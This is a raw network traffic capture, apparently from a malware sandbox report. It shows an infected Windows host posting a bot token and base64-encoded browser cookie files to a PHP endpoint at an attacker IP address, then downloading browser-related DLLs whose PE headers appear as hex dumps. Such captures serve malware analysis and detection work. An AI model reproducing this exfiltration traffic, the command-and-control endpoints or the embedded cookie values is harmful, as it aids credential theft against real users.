77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------DAECAECFCAAEBFHIEHDG--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:05.578618050 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:05.656409025 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFB
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 359
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file"------BGDAKEHIIDGDAAKECBFB--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:05.986634970 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:06.627954960 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJ
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 359
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="file"------IDHDGIEHJJJJEBGDAFHJ--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:06.952019930 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:06 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:07.270808935 CEST93OUTGET /15f649199f40275b/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:07.575079918 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:07 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 685392
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:08.839369059 CEST93OUTGET /15f649199f40275b/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:09.147047997 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 608080
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:09.779910088 CEST94OUTGET /15f649199f40275b/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:10.086596966 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 450024
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:10.681339025 CEST90OUTGET /15f649199f40275b/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:10.989214897 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:10 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 2046288
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 